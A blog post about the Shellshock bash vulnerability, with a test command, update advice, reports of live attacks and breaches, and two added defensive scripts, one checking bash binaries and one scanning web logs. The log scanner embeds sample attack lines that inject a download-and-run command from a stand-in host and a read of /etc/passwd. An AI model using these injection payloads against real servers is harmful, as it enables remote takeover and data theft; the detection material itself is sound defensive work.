Shellshock – update #2: Yahoo and winzip.com hacked

(see updates at the end of this article)

You may have heard already about the newest security issue, Shellshock, which some are already calling the worst computer bug ever. I partly agree with that statement.

In short: Shellshock (CVE-2014-6271) is a bug in a program called “bash”, the default command shell on most non-Windows systems such as Linux and even Mac computers. Bash imports shell functions from environment variables, and the bug is that it keeps parsing after the function body and executes whatever commands follow it. Any network-facing service that copies attacker-controlled data into an environment variable and then starts bash (CGI web scripts are the main example, but DHCP clients and restricted SSH logins have the same problem) can therefore be made to run arbitrary commands, with the privileges of that service and without any login or admin status, letting attackers install malicious software on the system.

We all can be affected in two ways by Shellshock:

1.) If you run a computer/server (or device) that can be accessed from outside

2.) If you access a website on a server that has already been compromised

Regarding 2.) there are already servers known to have been compromised by malware installed through the Shellshock bug. Without being too pessimistic, I think it is not unlikely that we will soon see malware of this kind that captures sensitive information from website visitors or accesses databases with sensitive information. This is possible because code injected through Shellshock runs with the privileges of the exploited service (typically the web server account), which is usually enough to read the site’s configuration, credentials and data and is a good starting point for taking over the whole machine. Let’s hope that the admins of those websites update their systems quickly and watch their server log files carefully.

Regarding 1.) If you run a Linux or other Unix-like computer yourself (every Mac ships with bash too) or run a web server on Linux, you may be affected if the bash version on that machine has not been updated in the last few days.
You can test for the issue by entering the following command in a terminal:

env x='() { :;}; echo vulnerable' bash -c "echo no problem"

If you only see one or two warning messages (bash refusing to import the function x) followed by “no problem”, your bash has the fix. If the word “vulnerable” is printed first, the trailing command was executed, and you are in trouble if this system is reachable from the internet. Note that the first fix shipped by the distributions turned out to be incomplete and further bash updates followed, so re-run the test after every update.
Depending on your Linux distribution, update bash with “yum update bash” (Red Hat, CentOS, Fedora) or with “apt-get update” followed by “apt-get upgrade” (Debian, Ubuntu), or with the equivalent command of whatever package manager you use.
All current Mac computers are also affected. Apple has not yet published an update, but updating bash (and sh, which on OS X is just another build of bash) by hand is not too complicated. A good explanation can be found here:

apple.stackexchange.com/questions/146849

Thus, securing your own systems is quite easy and you should hurry to do so.
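As an added example (not part of the original post), the one-line test above can be wrapped in a small POSIX shell script that checks every bash binary on the machine and reports a status word per binary. It also runs a second probe for the parser bug that was left after the incomplete first fix: that probe makes a vulnerable bash turn “echo date” into a redirection and leave a file named “echo” behind. The script assumes that “env” and “mktemp -d” are available; the binaries it tests may be bash or any other sh.

```shell
#!/bin/sh
# Added example, not from the original post: wrap the one-line Shellshock test
# in a script that checks every bash binary on the machine and also runs the
# second, file-creating probe that catches the incomplete first fix.
# Assumed: "env" and "mktemp -d" exist; tested binaries may be bash or another sh.

# Probe one binary with the classic test. Exit codes:
#   0 = fix present (or not bash at all), 1 = VULNERABLE, 2 = could not test.
shellshock_probe() {
    bin="$1"
    [ -x "$bin" ] || return 2
    # The exported variable x looks like a function definition with a trailing
    # command. A vulnerable bash executes that trailing command while importing
    # the function; a fixed bash refuses the import and only runs the -c argument.
    out=$(env x='() { :;}; echo SHELLSHOCK_VULNERABLE' "$bin" -c 'echo probe-done' 2>/dev/null) || true
    case "$out" in
        *SHELLSHOCK_VULNERABLE*) return 1 ;;
        *probe-done*)            return 0 ;;
        *)                       return 2 ;;
    esac
}

# Second probe for the parser bug left after the first patch: a bash with only
# that patch turns "echo date" into a redirection and leaves a file named "echo"
# in the current directory. Exit codes as above.
shellshock_probe_incomplete_fix() {
    bin="$1"
    [ -x "$bin" ] || return 2
    tmp=$(mktemp -d 2>/dev/null) || tmp="${TMPDIR:-/tmp}/shellshock.$$"
    mkdir -p "$tmp" || return 2
    ( cd "$tmp" && env X='() { (a)=>\' "$bin" -c 'echo date' >/dev/null 2>&1 ) || true
    if [ -e "$tmp/echo" ]; then
        rm -rf "$tmp"
        return 1
    fi
    rm -rf "$tmp"
    return 0
}

# Print one status word for a binary: OK, VULNERABLE, PARTIAL-FIX or UNKNOWN.
shellshock_report() {
    rc=0; shellshock_probe "$1" || rc=$?
    case "$rc" in
        1) echo VULNERABLE; return 0 ;;
        2) echo UNKNOWN;    return 0 ;;
    esac
    rc=0; shellshock_probe_incomplete_fix "$1" || rc=$?
    case "$rc" in
        0) echo OK ;;
        1) echo PARTIAL-FIX ;;
        *) echo UNKNOWN ;;
    esac
}

# Check the usual locations; /bin/sh is included because on many systems
# (OS X among them) it is just another build of bash.
for bin in /bin/bash /usr/bin/bash /usr/local/bin/bash /opt/local/bin/bash /bin/sh; do
    [ -e "$bin" ] || continue
    printf '%-22s %s\n' "$bin" "$(shellshock_report "$bin")"
done
```

Run it as root after every bash update: a result of PARTIAL-FIX means the package you installed only contains the first patch and you should look for a newer one.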

However, what about all the devices running Linux, such as routers? “bash” is quite heavyweight software and not ideal for small devices; OpenWRT/DD-WRT, for instance, use the much smaller BusyBox ash shell instead and are not affected by this bug. But some routers and other devices such as streaming clients do have bash installed, and those definitely need a firmware update in order to be secured against Shellshock.

From my personal experience, I expect several new vulnerabilities and attacks on such devices in the near future, so you had better check for updates on all your devices.


UPDATE #1: Several of my web servers are already under attack, mainly from China. The biggest server is 202.38.120.248, which currently searches for insecure servers and executes a script from 195.225.34.101. I would strongly recommend that every webmaster scans their log files for strings like ‘:;}’.
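As an added example (not from the original post), here is a small shell script that does the log scan suggested above. It matches on the bash function-definition prefix “() {”, which also catches probes whose function body is written as “{ :; }” or contains some other filler, and then pulls the attacking address and the injected command out of each hit. It assumes the Apache/nginx “combined” log format, where the client address is the first field and request, referer and user-agent are quoted strings; the sample lines embedded in it are constructed for the example and use documentation-range addresses, not real attackers.

```shell
#!/bin/sh
# Added example, not from the original post: pull Shellshock probes out of a
# web server access log. Assumes the Apache/nginx "combined" log format, where
# the client address is the first field and the request, referer and user-agent
# are quoted strings. The SAMPLE_LOG lines below are constructed for this
# example and use documentation-range addresses (RFC 5737), not real attackers.

SAMPLE_LOG=$(cat <<'EOF'
203.0.113.5 - - [25/Sep/2014:10:12:03 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://198.51.100.7/x.sh -O /tmp/x; sh /tmp/x\""
198.51.100.23 - - [25/Sep/2014:10:12:09 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Sep/2014:10:13:41 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 200 77 "() { :; }; echo; /bin/cat /etc/passwd" "curl/7.37.0"
EOF
)

# Keep only lines that contain a bash function-definition prefix "() {".
# Matching this, rather than ":;}", also catches bodies written as "{ :; }"
# or with other filler commands.
shellshock_hits() {
    grep -E '\(\)[[:space:]]*[{]'
}

# For every hit print "<client ip><TAB><injected command>": the command is
# whatever follows the function body, cut at the closing quote of the log field.
shellshock_extract() {
    shellshock_hits | awk '
        # Return s cut at the first double quote that is not escaped with a backslash.
        function cut_at_quote(s,    i, c, prev) {
            prev = ""
            for (i = 1; i <= length(s); i++) {
                c = substr(s, i, 1)
                if (c == "\"" && prev != "\\") return substr(s, 1, i - 1)
                prev = c
            }
            return s
        }
        {
            if (!match($0, /\(\)[ \t]*[{]/)) next
            rest = substr($0, RSTART + RLENGTH)   # function body plus injected tail
            j = index(rest, "}")                   # the body ends at its closing brace
            if (j == 0) next
            payload = cut_at_quote(substr(rest, j + 1))
            sub(/^[; \t]+/, "", payload)          # drop the ";" separating body and tail
            gsub(/\\"/, "\"", payload)            # undo the quote escaping done by the log writer
            printf "%s\t%s\n", $1, payload
        }'
}

# Count hits per client address, most active first.
shellshock_sources() {
    shellshock_hits | awk '{ n[$1]++ } END { for (ip in n) print n[ip], ip }' | sort -rn
}

# Stand-alone run over the constructed sample; on a real server pipe the
# access log in instead:  shellshock_extract < /var/log/apache2/access.log
printf '%s\n' "$SAMPLE_LOG" | shellshock_extract
printf '%s\n' "$SAMPLE_LOG" | shellshock_sources
```

The extracted commands are the interesting part: they tell you which download host and which script the attacker used, so you can check whether the file in /tmp already exists on your server and block the source address at the firewall.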


UPDATE #2: Yahoo and winzip.com were not as quick as us. They have been hacked already. If you have a yahoo.com account or are registered at winzip.com, I urge you to change your password. Don’t wait. You will find more information here: www.futuresouth.us/yahoo_hacked.html.

Don’t trust the evil

Regards,

Marcus